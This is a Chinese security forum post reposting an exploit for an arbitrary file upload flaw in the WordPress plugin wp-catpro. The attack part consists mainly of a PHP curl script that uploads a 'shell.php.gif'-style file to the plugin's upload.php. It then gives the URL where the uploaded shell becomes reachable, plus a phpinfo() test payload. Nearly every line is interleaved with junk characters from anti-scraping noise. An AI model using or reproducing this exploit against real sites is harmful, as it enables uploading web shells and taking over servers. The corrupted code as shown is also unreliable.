找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2182|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
5 B1 }/ {8 m2 Z0 [$ N' O4 [9 r8 Y#-----------------------------------------------------------------------3 d* d2 |  X' w# _
( C4 \  l7 h! d
作者  => Zikou-16" ~9 M2 L: }: d% d9 }5 [) g" Y+ L
邮箱 => zikou16x@gmail.com7 [( F9 u( j/ r- u7 t
测试系统 : Windows 7 , Backtrack 5r3* V" w1 ^- U! m; |7 m$ X/ I) E9 m
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip0 T/ Z0 J0 d+ ^; L1 T, V
####9 s* ~/ i8 x2 C
9 I6 ^1 {. {2 `% I/ ^, d' d
#=> Exploit 信息:+ h2 Q2 B. F' d4 X, c% B
------------------
3 r9 F+ ?4 L/ h1 z5 z4 r8 Z# 攻击者可以上传 file/shell.php.gif
6 W0 o6 E$ u- m- w* B3 z  m: D# ("jpg", "gif", "png")  // Allowed file extensions2 b! |- c. ?5 l& @- b
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)9 C$ u. T1 E& r1 `5 X0 U
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
! m# I( {4 @- O$ G------------------
, z: m9 X  f8 a3 X3 o  s0 m ! e4 ^- ~6 y: A7 Z
#=> Exploit( M3 H- [! q. v$ R3 o7 ^* M, o8 H$ b9 v
-----------
; G, p" @2 B1 E6 Y9 ?4 v<?php+ v6 @1 J2 k* d- e) ]% G

9 {9 w; y% f/ ^2 [$uploadfile="zik.php.gif";  J, k5 L  g. F; F% P
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");! Z9 F6 Z. l9 B/ i$ }3 N' F
curl_setopt($ch, CURLOPT_POST, true);; t+ u: I; k4 N
curl_setopt($ch, CURLOPT_POSTFIELDS,/ K6 H5 C, }$ \/ F, `
array('Filedata'=>"@$uploadfile",
7 X1 w! d9 C( O9 h/ h'folder'=>'/wp-content/uploads/catpro/'));" d6 d+ y, E2 g3 }6 G- c
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
( b, y0 Y3 n! |- I! S$postResult = curl_exec($ch);
; g* ^$ H/ O1 ^, t& o, kcurl_close($ch);% |& Z$ ~! C; b0 p* [  t/ B
7 J( E( L% }6 i" f( s2 H: m1 \
print "$postResult";8 l, J1 w$ J3 I* G% B, J
. K$ n+ `- `6 a8 l" F
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif( W/ _( @; R7 J
  ?>
& O0 n' A" O' L/ ?1 ]4 s, C- Z<?php# Z  o1 C8 d5 ~6 s( {- I
phpinfo();
- ]+ e2 o6 _0 w% L  q1 d5 q* l?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表